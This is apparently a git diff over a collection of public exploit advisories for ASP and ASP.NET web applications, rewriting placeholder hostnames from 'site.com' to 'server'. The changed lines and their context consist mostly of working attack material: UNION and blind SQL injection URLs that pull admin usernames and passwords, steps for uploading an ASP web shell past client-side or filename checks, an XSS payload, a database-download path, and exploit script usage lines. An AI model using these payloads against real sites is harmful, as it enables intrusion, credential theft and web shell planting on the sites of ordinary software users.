http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
|
||||
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?member=&show=member-profile&tab=meta
|
||||
|
||||
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
|
||||
|
||||
|
|
|
|||
|
|
@ -38,7 +38,7 @@ Vulnerability:
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://www.site.com/detail.asp?ad_ID=1&vehicletypeID=[sqli]
|
||||
http://www.server/detail.asp?ad_ID=1&vehicletypeID=[sqli]
|
||||
|
||||
|
||||
# 0day n0 m0re #
|
||||
|
|
|
|||
|
|
@ -45,7 +45,7 @@ if id<>"" then
|
|||
lots of files those will have to do input validation from user input are vulnerable to SQL Injection .
|
||||
|
||||
PoC :
|
||||
www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
|
||||
www.server/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/*
|
||||
note : if you can't see result you need to do it blindly
|
||||
|
||||
|
||||
|
|
@ -53,7 +53,7 @@ note : if you can't see result you need to do it blindly
|
|||
2- Bypass uploads restriction:
|
||||
|
||||
after you got user/pass with sql injection go to
|
||||
http://site.com/admin/dc_upload.asp
|
||||
http://server/admin/dc_upload.asp
|
||||
|
||||
js file line 13-34 :
|
||||
|
||||
|
|
@ -82,4 +82,4 @@ function showthumb(file) {
|
|||
|
||||
as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload "ASP" shell.
|
||||
|
||||
you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
|
||||
you can find your shell in : www.server/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload)
|
||||
|
|
@ -65,4 +65,3 @@ PoC:
|
|||
Note that : the value 2010_7_25 is the exact date of server.
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -46,14 +46,14 @@ Description :
|
|||
|
||||
Considering to the code, you can browse these URLs:
|
||||
|
||||
http://www.site.com/module/article/article/article.asp?articleid=7' (the false Query will be shown)
|
||||
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
|
||||
http://www.server/module/article/article/article.asp?articleid=7' (the false Query will be shown)
|
||||
http://www.server/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this Query is always true)
|
||||
|
||||
with the following URL you can find the first character of Username:
|
||||
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
|
||||
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)--
|
||||
|
||||
and second character:
|
||||
http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
|
||||
http://www.server/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)--
|
||||
|
||||
and so on.
|
||||
|
||||
|
|
|
|||
|
|
@ -83,4 +83,3 @@ This page remove Admins Role in VWD-CMS.
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -179,4 +179,3 @@ Persistent XSS and XSRF:
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -183,4 +183,3 @@ This page uploads a file
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -61,4 +61,3 @@ Persistent XSS in admin section:
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -9,7 +9,7 @@ Gokhun ASP Stok v1.0 - Multiple Remote Vulnerabilities
|
|||
~Script : Gokhun ASP Stok v1.0
|
||||
~Software: http://www.gokhun.com & http://www.aspindir.com/goster/6092
|
||||
~Vulnerability Style : Multiple vulnerabilities
|
||||
~Demo : http://www.site.com/asp/pages/main/
|
||||
~Demo : http://www.server/asp/pages/main/
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
~~~~~~~~ Explotation ~~~~~~~~~~~
|
||||
======== SQL Injection =========
|
||||
|
|
@ -51,7 +51,7 @@ print "[-]Ornegi inceleyin\n\n";
|
|||
}
|
||||
sub help()
|
||||
{
|
||||
print "[+] usage1 : perl $0 site.com /path/ \n";
|
||||
print "[+] usage1 : perl $0 server /path/ \n";
|
||||
print "[+] usage2 : perl $0 localhost / \n";
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -160,4 +160,3 @@ This page uploads a file with "xml" extension
|
|||
</html>
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -40,7 +40,7 @@ if len(sys.argv) < 2:
|
|||
print " "
|
||||
print " coded by ZoRLu "
|
||||
print " "
|
||||
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
|
||||
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
|
||||
print " "
|
||||
print "_______________________________________________________________"
|
||||
sys.exit(1)
|
||||
|
|
|
|||
|
|
@ -38,7 +38,7 @@ if len(sys.argv) < 2:
|
|||
print " "
|
||||
print " coded by ZoRLu "
|
||||
print " "
|
||||
print ' usage: %s http://server.com/path/' % os.path.basename(sys.argv[0])
|
||||
print ' usage: %s http://server/path/' % os.path.basename(sys.argv[0])
|
||||
print " "
|
||||
print "_______________________________________________________________"
|
||||
sys.exit(1)
|
||||
|
|
|
|||
|
|
@ -29,7 +29,7 @@ if len(sys.argv) < 2:
|
|||
print " "
|
||||
print " Usage: "
|
||||
print " "
|
||||
print " python exploit.py http://site.com/path/ "
|
||||
print " python exploit.py http://server/path/ "
|
||||
print " "
|
||||
print "_______________________________________________________________"
|
||||
sys.exit(1)
|
||||
|
|
|
|||
|
|
@ -49,7 +49,7 @@ print "[-]Ornegi inceleyin\n\n";
|
|||
}
|
||||
sub help()
|
||||
{
|
||||
print "[+] usage1 : perl $0 site.com /path/ \n";
|
||||
print "[+] usage1 : perl $0 server /path/ \n";
|
||||
print "[+] usage2 : perl $0 localhost / \n";
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -29,7 +29,7 @@ private void Page_Load(object sender, EventArgs e)
|
|||
}
|
||||
[-] End Poc
|
||||
[#] Exploit :
|
||||
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
|
||||
http://server/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script>
|
||||
|
||||
|
||||
[2] Remote File Upload :
|
||||
|
|
@ -41,14 +41,14 @@ string acceptedFiles =
|
|||
";.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;";
|
||||
You Can Bypass
|
||||
[-] End Poc
|
||||
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]
|
||||
[#] Exploit :http://server/DesktopModules/ftb/ftb.imagegallery.aspx[*]
|
||||
|
||||
|
||||
[3] Information Leakage Show Device Info :
|
||||
http://Site.Com/security/DeviceInfo.aspx
|
||||
http://server/security/DeviceInfo.aspx
|
||||
|
||||
[4] Xss Present :
|
||||
http://Site.Com/security/DeviceInfo.aspx
|
||||
http://server/security/DeviceInfo.aspx
|
||||
[~] Poc :
|
||||
Douran.dll:DouranPortal.DesktopModules.BlogDB
|
||||
Submit Data Without Check{
|
||||
|
|
@ -104,7 +104,7 @@ SqlDbType.NVarChar, 100);
|
|||
command.ExecuteNonQuery();
|
||||
sqlConnectionString.Close();}
|
||||
[-] End Poc
|
||||
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
|
||||
[#] Exploit :http://server/DesktopModules/Blog/BlogView.aspx
|
||||
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]
|
||||
|
||||
~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
|
|
|||
|
|
@ -25,7 +25,7 @@ NewsPad Database Download Vulnerability
|
|||
|
||||
############################################################
|
||||
|
||||
exploit # www.target.com/path/database/NewsPad.mdb
|
||||
exploit # server/path/database/NewsPad.mdb
|
||||
|
||||
|
||||
############################################################
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
) ) ) ( ( ( ( ( ) )
|
||||
) ) ) ( ( ( ( ( ) )
|
||||
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
) ) ) ( ( ( ( ( ) )
|
||||
) ) ) ( ( ( ( ( ) )
|
||||
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
) ) ) ( ( ( ( ( ) )
|
||||
) ) ) ( ( ( ( ( ) )
|
||||
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
) ) ) ( ( ( ( ( ) )
|
||||
) ) ) ( ( ( ( ( ) )
|
||||
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
|
|
|
|||
|
|
@ -17,13 +17,13 @@ Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
|
|||
|
||||
exploit # /UserControls/Dialogs/ImageEditorDialog.aspx
|
||||
|
||||
first go to # http://site.com/sitefinity/
|
||||
first go to # http://server/sitefinity/
|
||||
|
||||
then # http://site.com/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
|
||||
then # http://server/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
|
||||
|
||||
select # asp renamed via the .asp;.jpg (shell.asp;.jpg)
|
||||
|
||||
Upload to # http://site.com/Images/[shell]
|
||||
Upload to # http://server/Images/[shell]
|
||||
|
||||
|
||||
Video : http://net-edit0r.persiangig.com/Film/0day.rar
|
||||
|
|
|
|||
|
|
@ -46,4 +46,4 @@ Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
|
|||
BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker
|
||||
|
||||
|
||||
###########################################################################
|
||||
###########################################################################
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
Core Security Technologies - CoreLabs Advisory
|
||||
Core Security Technologies - CoreLabs Advisory
|
||||
http://corelabs.coresecurity.com/
|
||||
|
||||
Multiple vulnerabilities in BugTracker.Net
|
||||
|
|
|
|||
|
|
@ -24,4 +24,4 @@ Code: ASP 2.0 & VBScript
|
|||
SQL Injection:
|
||||
|
||||
http://server/ECO.asp?ECO_ID=[Code]
|
||||
########################################################################################
|
||||
########################################################################################
|
||||
|
|
@ -24,4 +24,4 @@ Sell e-books, e-zines, Flash, digital arts, ringtones... Code: ASP 2.0 & VBScrip
|
|||
SQL Injection:
|
||||
|
||||
http://server/shoppingcart.asp?d=[Code]
|
||||
########################################################################################
|
||||
########################################################################################
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/perl -w
|
||||
#!/usr/bin/perl -w
|
||||
# D2KBLOG SQL injection
|
||||
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
|
||||
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
|
||||
|
|
@ -15,7 +15,7 @@ print "\r\n=-=-=-===============================================================
|
|||
if (@ARGV != 2)
|
||||
{
|
||||
print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
|
||||
print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
|
||||
print " ex: kapda_D2KBLOG_xpl.pl server /blog/profile.asp\n\r\n";
|
||||
exit ();
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -36,4 +36,3 @@ Personal
|
|||
# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon
|
||||
|
||||
|
||||
|
||||
|
|
@ -8,7 +8,7 @@
|
|||
# Found: Br0ly
|
||||
# google dork: inurl:"produtos.asp?produto="
|
||||
# Use some base64 decode google IT.
|
||||
# After decoding login and pass go to: www.site.com.br/administrador.asp
|
||||
# After decoding login and pass go to: www.server.br/administrador.asp
|
||||
# aoiuaoaaaaiuahiuahaaiauhaiuha EASY ???
|
||||
# BRASIL!! :D
|
||||
#
|
||||
|
|
|
|||
|
|
@ -10,4 +10,4 @@ Attackers can use a browser to exploit this issue.
|
|||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/resulttype.asp?probe=[Code]
|
||||
http://www.example.com/resulttype.asp?probe=[Code]
|
||||
|
|
@ -6,11 +6,11 @@ dork : intext:"powered by DiyWeb"
|
|||
SQL - Microsoft JET Database Engine error
|
||||
-----------------------------------------
|
||||
|
||||
http://site.com/template.asp?menuid=[SQL]
|
||||
http://site.com/viewcatalog.asp?id=[SQL]
|
||||
http://site.com/xxx.asp?id=[SQL]
|
||||
http://server/template.asp?menuid=[SQL]
|
||||
http://server/viewcatalog.asp?id=[SQL]
|
||||
http://server/xxx.asp?id=[SQL]
|
||||
|
||||
XSS
|
||||
---
|
||||
http://site.com/diyweb/login.asp?msg=[XSS] -- login page
|
||||
http://server/diyweb/login.asp?msg=[XSS] -- login page
|
||||
|
||||
|
|
|
|||
|
|
@ -8,21 +8,21 @@ Blind SQL
|
|||
|
||||
POC
|
||||
---
|
||||
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
|
||||
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE
|
||||
http://server//gallery_details.asp?a_id=12' and '1'='1 TRUE
|
||||
http://server//gallery_details.asp?a_id=12' and '0'='1 FALSE
|
||||
|
||||
2 - Parameter news.asp?intSeq=[Blind SQL]
|
||||
|
||||
POC
|
||||
---
|
||||
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
|
||||
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE
|
||||
http://www.server/news/news.asp?intSeq=69' and '1'='1 TRUE
|
||||
http://www.server/news/news.asp?intSeq=69' and '0'='1 FALSE
|
||||
|
||||
3 - Parameter news.asp?id=[Blind SQL]
|
||||
|
||||
POC
|
||||
---
|
||||
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
|
||||
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE
|
||||
http://www.server/news/news.asp?id=256 and 1=1 TRUE
|
||||
http://www.server/news/news.asp?id=256 and 1=0 FALSE
|
||||
|
||||
|
||||
|
||||
|
|
@ -8,13 +8,13 @@ SQL - Microsoft JET Database Engine error
|
|||
------------------------------------------
|
||||
|
||||
view_article.asp?item=[SQL]
|
||||
http://site.com/page.asp?pID=[SQL]
|
||||
http://site.com/display.asp?sortby=sections&sID=[SQL]
|
||||
http://server/page.asp?pID=[SQL]
|
||||
http://server/display.asp?sortby=sections&sID=[SQL]
|
||||
|
||||
POC
|
||||
---
|
||||
|
||||
http://site.com/view_article.asp?item=1 union select 1 from test.a
|
||||
http://server/view_article.asp?item=1 union select 1 from test.a
|
||||
|
||||
thanks,
|
||||
-p0pc0rn-
|
||||
|
|
@ -5,10 +5,10 @@ Found by: p0pc0rn
|
|||
SQL
|
||||
---
|
||||
|
||||
http://site.com/page.asp?id=[SQL]
|
||||
http://site.com/cat.asp?catid=[SQL]
|
||||
http://site.com/catin.asp?productid=[SQL]
|
||||
http://server/page.asp?id=[SQL]
|
||||
http://server/cat.asp?catid=[SQL]
|
||||
http://server/catin.asp?productid=[SQL]
|
||||
|
||||
POC
|
||||
---
|
||||
http://site.com/page.asp?id=23 union select 1 from test.a
|
||||
http://server/page.asp?id=23 union select 1 from test.a
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@
|
|||
# Software: Element-IT PowUpload 1.3
|
||||
# Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
|
||||
# Demo:
|
||||
http://site.com/Examples/PowUpload/Simpleupload.htm
|
||||
http://server/Examples/PowUpload/Simpleupload.htm
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
|
|
|
|||
|
|
@ -5,7 +5,7 @@
|
|||
# Author Web: www.delincuentedigital.com.ar
|
||||
# Software: EAFlashUpload v 2.5
|
||||
# Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
|
||||
# Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
|
||||
# Demo: http://www.server/examples/eaflashupload/simpleupload.aspx
|
||||
|
||||
[Comment]
|
||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
|
||||
|
|
|
|||
|
|
@ -28,10 +28,10 @@
|
|||
#
|
||||
#
|
||||
#
|
||||
# [+]http://site.com/default.asp?pid=524'
|
||||
# [+]http://site.com/default.asp?pid=[SQLi]
|
||||
# [+]http://site.com/viewproduct.asp?PID=130'
|
||||
# [+]http://site.com/viewproduct.asp?PID=[SQli]
|
||||
# [+]http://server/default.asp?pid=524'
|
||||
# [+]http://server/default.asp?pid=[SQLi]
|
||||
# [+]http://server/viewproduct.asp?PID=130'
|
||||
# [+]http://server/viewproduct.asp?PID=[SQli]
|
||||
#
|
||||
#
|
||||
# => PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@
|
|||
First you must be logged in
|
||||
Then type this in your browser
|
||||
|
||||
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
|
||||
http://www.server/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
|
||||
|
||||
You will find admin's password
|
||||
|
||||
|
|
|
|||
|
|
@ -12,7 +12,7 @@ Exploit Details :
|
|||
|
||||
2- Browse This Link : /forum/pm_show_message.asp?ID= "it's a message on Your Inbox"
|
||||
|
||||
3- Poc: www.site.com//forum/pm_show_message.asp?ID=(inject here)
|
||||
3- Poc: www.server//forum/pm_show_message.asp?ID=(inject here)
|
||||
----------------------------------------------------------------
|
||||
|
||||
****** SSMM T34M ******
|
||||
|
|
|
|||
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Reference in a new issue